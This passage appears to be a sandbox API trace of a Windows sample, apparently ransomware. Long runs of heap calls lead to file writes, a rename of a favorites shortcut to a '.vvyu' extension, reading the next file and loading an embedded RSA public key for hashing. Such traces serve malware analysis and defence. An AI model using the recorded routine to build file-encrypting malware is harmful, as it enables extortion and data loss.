RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.221] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39958 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39940 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.224] GetCurrentThreadId () returned 0x264 [0189.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d439d0 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.225] GetCurrentThreadId () returned 0x264 [0189.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39958 [0189.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399b8 [0189.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399d0 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39970 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39940 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d390f0 | out: hHeap=0x6a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.238] WriteFile (in: hFile=0x584, lpBuffer=0x794008*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x794008*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.238] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.239] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.240] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.241] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.241] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.241] CloseHandle (hObject=0x584) returned 1 [0189.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0189.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.242] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url.vvyu")) returned 1 [0189.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.245] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d9d0 | out: hHeap=0x6a0000) returned 1 [0189.248] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0189.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d9d0 [0189.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.248] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0189.248] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.250] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=134) returned 1 [0189.250] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.252] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.253] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.254] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.254] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x86, lpOverlapped=0x0) returned 1 [0189.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.254] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.255] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.255] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.255] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.256] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) 